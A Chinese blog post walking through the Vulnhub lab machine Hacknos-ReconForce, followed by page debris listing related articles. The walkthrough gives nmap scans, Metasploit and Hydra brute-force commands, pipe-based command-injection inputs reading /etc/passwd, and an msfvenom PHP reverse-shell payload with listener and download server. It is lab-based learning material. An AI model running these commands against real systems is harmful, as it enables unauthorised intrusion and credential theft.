Hacknos-ReconForce靶机

已于 2024-07-12 14:34:59 修改
阅读量243 收藏 1
点赞数 2
文章标签: 网络安全
于 2024-07-12 14:29:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zdd1453691081/article/details/140378506
版权

(1)扫描ip

nmap -sn 192.168.7.0/24
nmap -sn 192.168.7.0/24 | grep -B 2 '08:00:27:FC:1F:9A'

(2)目录扫描

(3)端口扫描

(4)点击中间的TroubleShoot,发现登录框

(5)尝试ftp匿名登录,发现一个Security@hackNos

(6)将这个字段加入http_default_pass.txt字典里面去

vim /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt

(7)使用msfconsole进行爆破

msconsole     
use auxiliary/scanner/http/http_login
show options	# 获知密码的字典位置,把“Security@hackNos”加入到密码字典中
set AUTH_URI /5ecure/
set STOP_ON_SUCCESS true
set RHOSTS 192.168.7.20
exploit

(8)爆破出网站的账号密码:admin,Security@hackNos,登录之后,如下图

(9)burp抓包发现存在命令执行漏洞

(10)%7Cls查看,发现out.php

%7C 管道符
%7Cls   --》 | ls

(11)查看out.php文件中发现过滤规则...

%7Ccat out.php

(12)查看查看/etc/passwd文件中发现recon用户是可以进行登录...

%7Ccat /etc/passwd

(13)使用MSF生成一个PHP木马并开启一个http服务提供下载...开启MSF监听模块

msfconsole

####生成恶意文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.7.48 lport=4444 -f raw > f4.php         

####开启MSF监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.7.48
exploit

####开启Web服务
python3 -m http.server 80

(14)并在目标站点上下载并执行PHP代码

(15)监听到了

#创建一个伪终端
python -c 'import pty; pty.spawn("/bin/bash")'

(16)获取第一个Flag...使用Hydra对SSH服务进行暴力破解...得出用户密码recon:Security@hackNos在Shell中进行用户身份切换或登录..

hydra -l recon -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt ssh://192.168.7.20

(17)ssh连接成功

ssh recon@192.168.7.20

阿卡丽的神秘铺子
关注
hacknos-reconforce靶机
weixin_73074638的博客
07-11 235
开放了三个端口。
Hacknos-ReconForce靶机渗透测试
weixin_58786230的博客
07-12 265
【代码】Hacknos-ReconForce靶机渗透测试。
Vulnhub靶机HACKNOS_ RECONFORCE (V1.1)
LainWith的博客
02-05 1994
目录介绍信息收集主机发现主机信息探测测试21(ftp)访问网站目录扫描登录爆破命令执行反弹shellFlag1切换身份提权获取Flag2方法1:sudo提权方法2:docer提权参考 介绍 系列: hackNos(此系列共7台) 发布日期:2019 年 11 月 29 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: msf爆破网站登录框 命令执行漏洞 msf反弹shell sudo提权、docker提权 靶机地址:https://www.vulnhub.com/entry
Vulnhub-Os-hackNos-1(包含靶机获取不了IP地址)
m0_60894143的博客
07-07 892
发现wget具有suid权限,而且普通用户可以执行,那么可以通过下载目标靶机上的passwd文件,然后添加一个有root权限的用户到passwd文件中,然后使用wget -O将内容重定向到目标靶机的/etc/passwd中。https://download.vulnhub.com/hacknos/Os-hackNos-1.ova #靶机下载地址。需要搜索到带有s的文件,开始查找 find / -perm -u=s -type f 2>/dev/null。推荐使用arp-scan -l。
vulnhub-hackNos-Reconforce
qq_41810304的博客
02-26 371
下载地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 前言: 作为小白(此处省略n个字),文章提到的工具及漏洞仅用于学习。最近有没有什么好看的番剧啊,求推荐啊!!!蹲在家里好无聊啊!!! Kali:192.168.1.4 目标机:192.168.1.28 信息收集(确切的说应该是端口扫描): 漏洞挖掘: 从扫...
vulnhub靶机 Os-hackNos-1
weixin_46107179的博客
03-02 3954
Os-hackNos-1: 靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401 下载好靶机之后,如果通过虚拟机打开,不能获取ip地址,kali机也扫描不到靶机ip地址的话,就在启动界面按shift,会出现该画面 然后按e进入编辑界面,将ro改为rw single init=/bin/bash 然后按Ctrl+x进入命令行,ip -a查看网卡,名称为ens33,然后对网卡信息进行编辑 vim /etc/network/interfaces改为如下
Vulnhub靶机HACKNOS:OS-HACKNOS-2.1
LainWith的博客
02-05 3235
目录介绍信息收集主机发现主机信息探测网站探测目录扫描wpscan漏扫网站测试POC破解用户密码SSH登录破解用户密码Flag1提权-Flag2参考 介绍 系列: hackNos(此系列共7台) 发布日期:2020 年 1 月 18 日 难度:初级-中级 Flag : 2个,一个普通用户的,一个根用户的 学习: wordpress 安全测试 本地包含漏洞利用 john破解 特权提升 靶机地址:https://www.vulnhub.com/entry/hacknos-reconforce,416/ 信息收
VulnHub:Hacknos-ReconForce
wbplife的博客
07-12 263
不知道登录名是什么,也懒得测试,直接拿msf爆破,连找字典都省了。接下来就需要切换身份为 recon 了,前面曾使用msf爆破过网站,将其字典拿过来,供hydra爆破。爆破出网站的账号密码:admin,Security@hackNos,登录之后,如下图。就是目标靶机...使用Nmap进行详细的扫描发现开放了21/22/80端口....服务提供下载...开启MSF监听模块...并在目标站点上下载并执行PHP代码..爆破出用户名:recon,密码:Security@hackNos。工具进行主机发现...出现。
Hacknos-ReconForce打靶渗透
m0_65112983的博客
07-14 430
Hacknos-ReconForce打靶渗透
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
sqli-labs-master靶机
10-12
sqli-labs是一个专门为学习和测试SQL注入技术而设计的靶机平台,它提供了多个层次的练习,帮助用户逐步理解和掌握SQL注入的防范与应对策略。 一、sqli-labs靶机介绍 sqli-labs靶机由一系列精心设计的挑战组成,每个...
Os-HackNos-2.1靶机
weixin_46062722的博客
11-18 317
实验环境 攻击机器IP地址:192.168.4.93 目标靶机IP地址:192.168.4.87 网络环境:桥接网络 信息收集 先查看攻击机kali Linux的IP地址 命令:ifconfig 得到自己的IP地址192.168.4.93 我们用Nmap扫描一下存活的主机 命令:nmap -sP 192.168.4.0/24 得到目标靶机IP地址为192.168.4.87 既然我们得到了目标靶机的IP地址,用nmap工具进行端口扫描,发现开放了22和80端口 命令:nmap -A -v 192.16
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8538
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2025年软考高级 - 信息系统项目管理师考试备考全攻略
11-09
2025年软考高级 - 信息系统项目管理师考试备考全攻略
MySQL 5.7从入门到精通 第23章 新闻发布系统数据库设计 共6页.pptx
最新发布
11-09
【课程大纲】 第1章 初始MySQL 共19页.pptx 第2章 MySQL的安装与配置 共14页.pptx 第3章 数据库的基本操作 共11页.pptx 第4章 数据表的基本操作 共26页.pptx 第5章 数据类型和运算符 共17页.pptx 第6章 MySQL函数 共76页.pptx 第7章 查询数据 共48页.pptx 第8章 插入、更新与删除数据 共10页.pptx 第9章 索引 共11页.pptx 第10章 存储过程和函数 共19页.pptx 第11章 视图 共20页.pptx 第12章 触发器 共11页.pptx 第13章 用户管理 共25页.pptx 第14章 数据备份与还原 共21页.pptx 第15章 MySQL日志 共22页.pptx 第16章 性能优化 共18页.pptx 第17章 MySQL Workbench5.2 的使用 共15页.pptx 第18章 MySQL Replication 共27页.pptx 第19章 MySQL Cluster 共49页.pptx 第20章 MySQL管理利器——MySQL Utilities 共5页.pptx 第21章 读写分离的利器——MySQL Proxy 共5页.pptx 第22章 PHP操作MySQL数据库 共7页.pptx 第23章 新闻发布系统数据库设计 共6页.pptx 第24章 论坛管理系统数据库设计 共6页.pptx
高分springboot毕设+vue的游戏创意工坊与推广平台的设计与实现_orv论文-Java源码.zip
11-09
本项目是一个基于Spring Boot和Vue的游戏创意工坊与推广平台的设计与实现。该项目旨在为游戏开发者和玩家提供一个集中的平台,使他们能够分享创意、展示作品并获取反馈。平台的核心功能包括游戏创意的提交与管理、游戏作品的展示与评价、用户间的互动交流以及推广活动的组织与管理。 在技术实现上,后端采用Spring Boot框架,利用其快速开发和部署的特点,确保系统的稳定性和高效性。前端则使用Vue.js,以其灵活的数据绑定和组件化开发方式,为用户提供流畅的交互体验。数据库设计充分考虑了数据的安全性和扩展性,以支持大量用户和作品的存储需求。 此外,项目还集成了多种实用工具和插件,如用户认证、权限管理、文件存储等,以提升平台的整体功能和用户体验。通过这个项目,用户不仅能够锻炼自己的编程技能,还能深入了解游戏开发和运营的全过程。
kali linux部署upload-labs靶机
09-08
要在Kali Linux上部署upload-labs靶机,您需要按照以下步骤进行操作: 1. 首先,您需要通过SSH连接到一个Linux主机。根据提供的端口和地址,使用以下命令连接到目标主机: `ssh -p 25142 root@node4.buuoj.cn` 2....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值